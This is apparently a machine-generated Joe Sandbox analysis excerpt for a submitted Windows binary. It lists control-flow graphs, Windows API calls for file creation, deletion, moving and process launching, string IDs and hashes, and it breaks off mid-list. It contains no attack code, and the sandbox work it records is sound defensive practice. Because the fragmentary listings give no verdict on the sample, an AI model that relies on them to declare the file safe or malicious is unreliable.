5cb99-5cba6 call 505da 440->463 441->430 475 5cbd0-5cbde call 505da 441->475 448->449 454 5cc0c-5cc0e 448->454 481 5cc67-5cc6b 449->481 454->449 457 5c90f-5c91f GetFileAttributesW 455->457 458 5c86f-5c8a2 call 4b991 call 4b690 call 63e13 455->458 456->369 457->438 467 5c921-5c930 DeleteFileW 457->467 490 5c8b5-5c8c3 call 4bdb4 458->490 491 5c8a4-5c8b3 call 63e13 458->491 463->441 467->438 474 5c932-5c935 467->474 469->433 470->469 478 5c939-5c965 call 44092 GetFileAttributesW 474->478 475->430 488 5c937-5c938 478->488 489 5c967-5c97d MoveFileW 478->489 481->369 485 5cc71-5cc85 SendMessageW 481->485 485->369 488->478 489->438 492 5c97f-5c989 MoveFileExW 489->492 490->456 497 5c8c9-5c908 call 63e13 call 5fff0 490->497 491->490 491->497 492->438 497->457
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005C744
                                                                                                                      • Part of subcall function 0005B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005B3FB
                                                                                                                    • _wcslen.LIBCMT ref: 0005CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 0005CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0005CA71
                                                                                                                    • _wcslen.LIBCMT ref: 0005CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0005CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0005CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0005CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0008A472), ref: 0005CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                    • Opcode ID: 660887ba8ab7f8ddc7c14481cff8ac9617159fd5788d14f13833efbae82b0ae3
                                                                                                                    • Instruction ID: bce36ad492a28ba843bb212ddbc4b386a04783950637dd2929f0887841bc89fc
                                                                                                                    • Opcode Fuzzy Hash: 660887ba8ab7f8ddc7c14481cff8ac9617159fd5788d14f13833efbae82b0ae3
                                                                                                                    • Instruction Fuzzy Hash: C6E168B2900219AAEF24DB60DD45DEF73BCAB05351F5440A6FA49E7041EB749F88CF61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0004DA70
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004DAAC
                                                                                                                      • Part of subcall function 0004C29A: _wcslen.LIBCMT ref: 0004C2A2
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 00051B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004BAE9,00000000,?,?,?,00010458), ref: 00051BA0
                                                                                                                    • _wcslen.LIBCMT ref: 0004DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 0004DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                    • Opcode ID: c565576d15d2061813cca575cc27c83cb163fba92e5dbbb5d4c9a2c809dd716a
                                                                                                                    • Instruction ID: 1a875b147eae12d898b5bb830101f438d1747a22f10ace2b4f7fbcff08c3a898
                                                                                                                    • Opcode Fuzzy Hash: c565576d15d2061813cca575cc27c83cb163fba92e5dbbb5d4c9a2c809dd716a
                                                                                                                    • Instruction Fuzzy Hash: B432D2B1900258EBDF64EF64C845AEE77A5FF04300F40457AFA059B292E7B1ED85CB98

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 801 5d4d4-5d500 call 5b568 GetDlgItem 804 5d536-5d570 SendMessageW * 2 801->804 805 5d502-5d52f call 59285 ShowWindow SendMessageW * 2 801->805 807 5d591-5d5c2 SendMessageW * 3 804->807 808 5d572-5d58d 804->808 805->804 810 5d5c4-5d5e1 SendMessageW 807->810 811 5d5e7-5d5fd SendMessageW 807->811 808->807 810->811
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005B579
                                                                                                                      • Part of subcall function 0005B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B58A
                                                                                                                      • Part of subcall function 0005B568: IsDialogMessageW.USER32(00010458,?), ref: 0005B59E
                                                                                                                      • Part of subcall function 0005B568: TranslateMessage.USER32(?), ref: 0005B5AC
                                                                                                                      • Part of subcall function 0005B568: DispatchMessageW.USER32(?), ref: 0005B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,0009FCB8), ref: 0005D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0005AF07,00000001,?,?,0005B7B9,0007506C,0009FCB8,0009FCB8,00001000,00000000,00000000), ref: 0005D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000743F4), ref: 0005D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: 13fc1220a3288cc711587d8d09f429ca64213cdd755fff16d5b2e6d28f721d34
                                                                                                                    • Instruction ID: c398bd47bfd88581c3c972f909b5f755991675d715678b147924b6e191f5bbd4
                                                                                                                    • Opcode Fuzzy Hash: 13fc1220a3288cc711587d8d09f429ca64213cdd755fff16d5b2e6d28f721d34
                                                                                                                    • Instruction Fuzzy Hash: 0231F171145B42AFF321DF20DC1AFAB7FACEB83305F000509FA9196191EB688A088776

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 836 5d78f-5d7a7 call 5ec50 839 5d7ad-5d7b9 call 63e13 836->839 840 5d9e8-5d9f0 836->840 839->840 843 5d7bf-5d7e7 call 5fff0 839->843 846 5d7f1-5d7ff 843->846 847 5d7e9 843->847 848 5d801-5d804 846->848 849 5d812-5d818 846->849 847->846 850 5d808-5d80e 848->850 851 5d85b-5d85e 849->851 853 5d837-5d844 850->853 854 5d810 850->854 851->850 852 5d860-5d866 851->852 857 5d86d-5d86f 852->857 858 5d868-5d86b 852->858 855 5d9c0-5d9c2 853->855 856 5d84a-5d84e 853->856 859 5d822-5d82c 854->859 860 5d9c6 855->860 856->860 861 5d854-5d859 856->861 862 5d882-5d898 call 4b92d 857->862 863 5d871-5d878 857->863 858->857 858->862 864 5d82e 859->864 865 5d81a-5d820 859->865 869 5d9cf 860->869 861->851 872 5d8b1-5d8bc call 4a231 862->872 873 5d89a-5d8a7 call 51fbb 862->873 863->862 866 5d87a 863->866 864->853 865->859 868 5d830-5d833 865->868 866->862 868->853 871 5d9d6-5d9d8 869->871 875 5d9e7 871->875 876 5d9da-5d9dc 871->876 881 5d8be-5d8d5 call 4b6c4 872->881 882 5d8d9-5d8e6 ShellExecuteExW 872->882 873->872 883 5d8a9 873->883 875->840 876->875 879 5d9de-5d9e1 ShowWindow 876->879 879->875 881->882 882->875 885 5d8ec-5d8f9 882->885 883->872 887 5d90c-5d90e 885->887 888 5d8fb-5d902 885->888 890 5d925-5d944 call 5dc3b 887->890 891 5d910-5d919 887->891 888->887 889 5d904-5d90a 888->889 889->887 892 5d97b-5d987 CloseHandle 889->892 890->892 904 5d946-5d94e 890->904 891->890 900 5d91b-5d923 ShowWindow 891->900 894 5d989-5d996 call 51fbb 892->894 895 5d998-5d9a6 892->895 894->869 894->895 895->871 899 5d9a8-5d9aa 895->899 899->871 903 5d9ac-5d9b2 899->903 900->890 903->871 905 5d9b4-5d9be 903->905 904->892 906 5d950-5d961 GetExitCodeProcess 904->906 905->871 906->892 907 5d963-5d96d 906->907 908 5d974 907->908 909 5d96f 907->909 908->892 909->908
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0005D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0005D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0005D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0005D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0005D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0005D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf
                                                                                                                    • API String ID: 36480843-3750412487
                                                                                                                    • Opcode ID: d23aa58dc6b1d032c09db228e2c72df69005ced21884d26661fc5e85bd417f55
                                                                                                                    • Instruction ID: c5ae991f8c1e7f066cbbeb37eebd290ad096a70a448e89402d570ac8bac5990d
                                                                                                                    • Opcode Fuzzy Hash: d23aa58dc6b1d032c09db228e2c72df69005ced21884d26661fc5e85bd417f55
                                                                                                                    • Instruction Fuzzy Hash: A851E470404384AAEB709B24D845BBB7BE5AF82746F04081FFDC5971A1EB74C98CDB52

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 910 6a95b-6a974 911 6a976-6a986 call 6ef4c 910->911 912 6a98a-6a98f 910->912 911->912 919 6a988 911->919 914 6a991-6a999 912->914 915 6a99c-6a9c0 MultiByteToWideChar 912->915 914->915 917 6a9c6-6a9d2 915->917 918 6ab53-6ab66 call 5fbbc 915->918 920 6aa26 917->920 921 6a9d4-6a9e5 917->921 919->912 923 6aa28-6aa2a 920->923 924 6a9e7-6a9f6 call 72010 921->924 925 6aa04-6aa15 call 68e06 921->925 928 6aa30-6aa43 MultiByteToWideChar 923->928 929 6ab48 923->929 924->929 938 6a9fc-6aa02 924->938 925->929 935 6aa1b 925->935 928->929 932 6aa49-6aa5b call 6af6c 928->932 933 6ab4a-6ab51 call 6abc3 929->933 940 6aa60-6aa64 932->940 933->918 939 6aa21-6aa24 935->939 938->939 939->923 940->929 942 6aa6a-6aa71 940->942 943 6aa73-6aa78 942->943 944 6aaab-6aab7 942->944 943->933 947 6aa7e-6aa80 943->947 945 6ab03 944->945 946 6aab9-6aaca 944->946 950 6ab05-6ab07 945->950 948 6aae5-6aaf6 call 68e06 946->948 949 6aacc-6aadb call 72010 946->949 947->929 951 6aa86-6aaa0 call 6af6c 947->951 954 6ab41-6ab47 call 6abc3 948->954 966 6aaf8 948->966 949->954 964 6aadd-6aae3 949->964 950->954 955 6ab09-6ab22 call 6af6c 950->955 951->933 963 6aaa6 951->963 954->929 955->954 967 6ab24-6ab2b 955->967 963->929 968 6aafe-6ab01 964->968 966->968 969 6ab67-6ab6d 967->969 970 6ab2d-6ab2e 967->970 968->950 971 6ab2f-6ab3f WideCharToMultiByte 969->971 970->971 971->954 972 6ab6f-6ab76 call 6abc3 971->972 972->933
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00065695,00065695,?,?,?,0006ABAC,00000001,00000001,2DE85006), ref: 0006A9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0006AA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0006AB35
                                                                                                                    • __freea.LIBCMT ref: 0006AB42
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • __freea.LIBCMT ref: 0006AB4B
                                                                                                                    • __freea.LIBCMT ref: 0006AB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: df3cde34d22855d6d0bb5a0b589904caca5693777b8738220bd769987ab778e9
                                                                                                                    • Instruction ID: b169cd2c9fdb1fc203fe059de7e4962099c689630716e4b77f8d91ecef23ef45
                                                                                                                    • Opcode Fuzzy Hash: df3cde34d22855d6d0bb5a0b589904caca5693777b8738220bd769987ab778e9
                                                                                                                    • Instruction Fuzzy Hash: 1A51B672700216ABDB256F64CC41EBFB7EBEB46710B154629FD04F6142DB34DC50DAA2

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 975 63b72-63b7c 976 63bee-63bf1 975->976 977 63bf3 976->977 978 63b7e-63b8c 976->978 979 63bf5-63bf9 977->979 980 63b95-63bb1 LoadLibraryExW 978->980 981 63b8e-63b91 978->981 984 63bb3-63bbc GetLastError 980->984 985 63bfa-63c00 980->985 982 63b93 981->982 983 63c09-63c0b 981->983 989 63beb 982->989 983->979 986 63be6-63be9 984->986 987 63bbe-63bd3 call 66088 984->987 985->983 988 63c02-63c03 FreeLibrary 985->988 986->989 987->986 992 63bd5-63be4 LoadLibraryExW 987->992 988->983 989->976 992->985 992->986
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00063C35,?,?,000A2088,00000000,?,00063D60,00000004,InitializeCriticalSectionEx,00076394,InitializeCriticalSectionEx,00000000), ref: 00063C03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                    • Opcode ID: 07e9e5858fa1c4b1a186752dff1859d52b287a8024ddd1c6d98cc87a08b04ff9
                                                                                                                    • Instruction ID: f4b6cb9cd0e582773ea9057821a9eb58f63f9941a3688e5418bef3503cc0bddc
                                                                                                                    • Opcode Fuzzy Hash: 07e9e5858fa1c4b1a186752dff1859d52b287a8024ddd1c6d98cc87a08b04ff9
                                                                                                                    • Instruction Fuzzy Hash: 30110A31E04620ABEB318B589C41B9D37A5DF017B0F111120FA15FB290E735EF4086D1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0005AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005AC66
                                                                                                                    • SHGetMalloc.SHELL32(00088438), ref: 0005AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3So
                                                                                                                    • API String ID: 3498096277-3464455743
                                                                                                                    • Opcode ID: 3cdf120a9686f5968c197b0dda0d52422da3c355b2e18cd9d916b90cbe2a5c9d
                                                                                                                    • Instruction ID: ac8b1fb8a91f818a956212864c7d4c3ccf132f8c29f7ce4ae6d1c8add75651c6
                                                                                                                    • Opcode Fuzzy Hash: 3cdf120a9686f5968c197b0dda0d52422da3c355b2e18cd9d916b90cbe2a5c9d
                                                                                                                    • Instruction Fuzzy Hash: A9F0F9B5D00209ABDB10AFA9D849DEFFBFCEF85701F00415AE955A2241DBB85605CFA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 997 498e0-49901 call 5ec50 1000 49903-49906 997->1000 1001 4990c 997->1001 1000->1001 1002 49908-4990a 1000->1002 1003 4990e-4991f 1001->1003 1002->1003 1004 49927-49931 1003->1004 1005 49921 1003->1005 1006 49936-49943 call 46edb 1004->1006 1007 49933 1004->1007 1005->1004 1010 49945 1006->1010 1011 4994b-4996a CreateFileW 1006->1011 1007->1006 1010->1011 1012 4996c-4998e GetLastError call 4bb03 1011->1012 1013 499bb-499bf 1011->1013 1017 499c8-499cd 1012->1017 1019 49990-499b3 CreateFileW GetLastError 1012->1019 1015 499c3-499c6 1013->1015 1015->1017 1018 499d9-499de 1015->1018 1017->1018 1020 499cf 1017->1020 1021 499e0-499e3 1018->1021 1022 499ff-49a10 1018->1022 1019->1015 1023 499b5-499b9 1019->1023 1020->1018 1021->1022 1024 499e5-499f9 SetFileTime 1021->1024 1025 49a12-49a2a call 50602 1022->1025 1026 49a2e-49a39 1022->1026 1023->1015 1024->1022 1025->1026
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00047760,?,00000005,?,00000011), ref: 0004995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00047760,?,00000005,?), ref: 000499A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000499AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00047760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000499F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
